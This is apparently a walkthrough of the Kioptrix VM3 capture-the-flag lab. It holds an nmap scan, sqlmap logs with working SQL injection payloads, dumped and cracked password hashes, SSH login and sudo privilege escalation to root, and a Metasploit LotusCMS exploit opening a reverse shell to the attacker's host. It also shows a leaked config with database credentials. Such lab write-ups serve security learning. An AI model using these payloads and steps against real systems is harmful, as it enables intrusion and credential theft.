# localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost127.0.0.1 static3.cdn.ubi.com 192.168.1.102 kioptrix3.com
在Linux下,将是/etc/hosts 这里涉及一个网络应用程序,因此要使所有内容都很好并正确显示,您确实需要这样做。 希望您喜欢Kioptrix VM Level 1.2挑战。 Have fun
漏洞:
文件包含
访问控制不当
重用凭证
SQL注入
不受限制地上传危险类型的文件
凭证不足
信息收集
上nmap
1 2 3 4
root@kali:~# nmap -sn -v 192.168.84.0/24 Nmap scan report for 192.168.84.144 Host is up (0.00023s latency). MAC Address: 00:0C:29:44:36:85 (VMware)
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 04:14:33 /2019-12-13/ [04:14:33] [INFO] parsing HTTP request from 'sqlmap.txt' [04:14:33] [INFO] resuming back-end DBMS 'mysql' [04:14:33] [INFO] testing connection to the target URL [04:14:33] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (5293=5293) THEN 1 ELSE (SELECT 1341 UNION SELECT 9380) END))&sort=photoid Type: error-based Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR) Payload: id=1 OR ROW(1324,2762)>(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(1324=1324,1))),0x7170786a71,FLOOR(RAND(0)*2))x FROM (SELECT 8520 UNION SELECT 1582 UNION SELECT 8916 UNION SELECT 1258)a GROUP BY x)&sort=photoid Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 4741 FROM (SELECT(SLEEP(5)))vtbf)&sort=photoid Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: id=1 UNION ALL SELECT CONCAT(0x7171766a71,0x4d67454a425a6e796b5745656b794f584a4348714c79624d4255416243444967494975507875524d,0x7170786a71),NULL,NULL,NULL,NULL,NULL-- TpfQ&sort=photoid Parameter: sort (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1&sort=photoid AND (SELECT 4185 FROM (SELECT(SLEEP(5)))Gmzf) --- there were multiple injection points, please select the one to use for following injections: [0] place: GET, parameter: id, type: Unescaped numeric (default) [1] place: GET, parameter: sort, type: Unescaped numeric [q] Quit [04:14:34] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [04:14:34] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 1 times [04:14:34] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com' [*] ending @ 04:14:34 /2019-12-13/
root@kali:~# sqlmap -r sqlmap.txt -D gallery -T dev_accounts --dump ___ __H__ ___ ___[)]_____ ___ ___ {1.3.12#stable} |_ -| . ["] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 04:18:17 /2019-12-13/ [04:18:17] [INFO] parsing HTTP request from 'sqlmap.txt' [04:18:17] [INFO] resuming back-end DBMS 'mysql' [04:18:17] [INFO] testing connection to the target URL [04:18:18] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (5293=5293) THEN 1 ELSE (SELECT 1341 UNION SELECT 9380) END))&sort=photoid Type: error-based Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR) Payload: id=1 OR ROW(1324,2762)>(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(1324=1324,1))),0x7170786a71,FLOOR(RAND(0)*2))x FROM (SELECT 8520 UNION SELECT 1582 UNION SELECT 8916 UNION SELECT 1258)a GROUP BY x)&sort=photoid Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 4741 FROM (SELECT(SLEEP(5)))vtbf)&sort=photoid Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: id=1 UNION ALL SELECT CONCAT(0x7171766a71,0x4d67454a425a6e796b5745656b794f584a4348714c79624d4255416243444967494975507875524d,0x7170786a71),NULL,NULL,NULL,NULL,NULL-- TpfQ&sort=photoid Parameter: sort (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1&sort=photoid AND (SELECT 4185 FROM (SELECT(SLEEP(5)))Gmzf) --- there were multiple injection points, please select the one to use for following injections: [0] place: GET, parameter: id, type: Unescaped numeric (default) [1] place: GET, parameter: sort, type: Unescaped numeric [q] Quit [04:18:18] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [04:18:18] [INFO] fetching columns for table 'dev_accounts' in database 'gallery' [04:18:18] [INFO] used SQL query returns 3 entries [04:18:19] [INFO] used SQL query returns 3 entries [04:18:19] [INFO] retrieved: 'id' [04:18:19] [INFO] retrieved: 'int(10)' [04:18:19] [INFO] retrieved: 'username' [04:18:19] [INFO] retrieved: 'varchar(50)' [04:18:19] [INFO] retrieved: 'password' [04:18:19] [INFO] retrieved: 'varchar(50)' [04:18:19] [INFO] fetching entries for table 'dev_accounts' in database 'gallery' [04:18:19] [INFO] used SQL query returns 2 entries [04:18:19] [INFO] retrieved: '1','0d3eccfb887aabd50f243b3f155c0f85','dreg' [04:18:19] [WARNING] automatically patching output having last char trimmed [04:18:19] [INFO] retrieved: '2','5badcaf789d3d1d09794d8f021f40f0e','loneferret' [04:18:19] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y [04:18:22] [INFO] writing hashes to a temporary file '/tmp/sqlmapa2cskfzq12456/sqlmaphashes-0oyz7rlz.txt' do you want to crack them via a dictionary-based attack? [Y/n/q] y [04:18:28] [INFO] using hash method 'md5_generic_passwd' what dictionary do you want to use? [1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > 1 [04:18:31] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] y [04:18:34] [INFO] starting dictionary-based cracking (md5_generic_passwd) [04:18:34] [INFO] starting 4 processes [04:18:39] [INFO] cracked password 'starwars' for user 'loneferret' [04:18:40] [INFO] cracked password 'Mast3r' for user 'dreg' Database: gallery Table: dev_accounts [2 entries] +----+---------------------------------------------+------------+ | id | password | username | +----+---------------------------------------------+------------+ | 1 | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) | dreg | | 2 | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret | +----+---------------------------------------------+------------+ [04:18:42] [INFO] table 'gallery.dev_accounts' dumped to CSV file '/root/.sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv' [04:18:42] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 1 times [04:18:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com' [*] ending @ 04:18:42 /2019-12-13/
root@kali:~# ssh loneferret@192.168.84.144 loneferret@192.168.84.144's password: Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106 loneferret@Kioptrix3:~$ ls checksec.sh CompanyPolicy.README loneferret@Kioptrix3:~$ id uid=1000(loneferret) gid=100(users) groups=100(users) loneferret@Kioptrix3:~$ pwd /home/loneferret loneferret@Kioptrix3:~$ whoami loneferret loneferret@Kioptrix3:~$ sudo -l User loneferret may run the following commands on this host: (root) NOPASSWD: !/usr/bin/su (root) NOPASSWD: /usr/local/bin/ht
loneferret@Kioptrix3:~$ sudo /bin/sh # whoami root # id uid=0(root) gid=0(root) groups=0(root) # pwd /home/loneferret # cd /root # cat Congrats.txt Good for you for getting here. Regardless of the matter (staying within the spirit of the game of course) you got here, congratulations are in order. Wasn't that bad now was it. Went in a different direction with this VM. Exploit based challenges are nice. Helps workout that information gathering part, but sometimes we need to get our hands dirty in other things as well. Again, these VMs are beginner and not intented for everyone. Difficulty is relative, keep that in mind. The object is to learn, do some research and have a little (legal) fun in the process. I hope you enjoyed this third challenge. Steven McElrea aka loneferret http://www.kioptrix.com Credit needs to be given to the creators of the gallery webapp and CMS used for the building of the Kioptrix VM3 site. Main page CMS: http://www.lotuscms.org Gallery application: Gallarific 2.1 - Free Version released October 10, 2009 http://www.gallarific.com Vulnerable version of this application can be downloaded from the Exploit-DB website: http://www.exploit-db.com/exploits/15891/ The HT Editor can be found here: http://hte.sourceforge.net/downloads.html And the vulnerable version on Exploit-DB here: http://www.exploit-db.com/exploits/17083/ Also, all pictures were taken from Google Images, so being part of the public domain I used them.
msf5 > use exploit/multi/http/lcms_php_exec msf5 exploit(multi/http/lcms_php_exec) > set RHOSTS 192.168.84.144 RHOSTS => 192.168.84.144 msf5 exploit(multi/http/lcms_php_exec) > set payload generic/shell_reverse_tcp payload => generic/shell_reverse_tcp msf5 exploit(multi/http/lcms_php_exec) > set LHOST 192.168.84.135 LHOST => 192.168.84.135 msf5 exploit(multi/http/lcms_php_exec) > set URI / URI => /
msf5 exploit(multi/http/lcms_php_exec) > exploit
[*] Started reverse TCP handler on 192.168.84.135:4444 [*] Using found page param: /index.php?page=index [*] Sending exploit ... [*] Command shell session 2 opened (192.168.84.135:4444 -> 192.168.84.144:57666) at 2019-12-14 06:18:03 -0500
cat gallery/gconfig.php <?php error_reporting(0); /* A sample Gallarific configuration file. You should edit the installer details below and save this file as gconfig.php Do not modify anything elseif you don't know what it is. */ // Installer Details ----------------------------------------------- // Enter the full HTTP path to your Gallarific folder below, // such as http://www.yoursite.com/gallery // Do NOT include a trailing forward slash $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery"; $GLOBALS["gallarific_mysql_server"] = "localhost"; $GLOBALS["gallarific_mysql_database"] = "gallery"; $GLOBALS["gallarific_mysql_username"] = "root"; $GLOBALS["gallarific_mysql_password"] = "fuckeyou"; // Setting Details ------------------------------------------------- if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) { echo("A connection to the database couldn't be established: " . mysql_error()); die(); }else { if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) { echo("The Gallarific database couldn't be opened: " . mysql_error()); die(); }else { $settings=mysql_query("select * from gallarific_settings"); if(mysql_num_rows($settings)!=0){ while($data=mysql_fetch_array($settings)){ $GLOBALS["{$data['settings_name']}"]=$data['settings_value']; } } } } ?>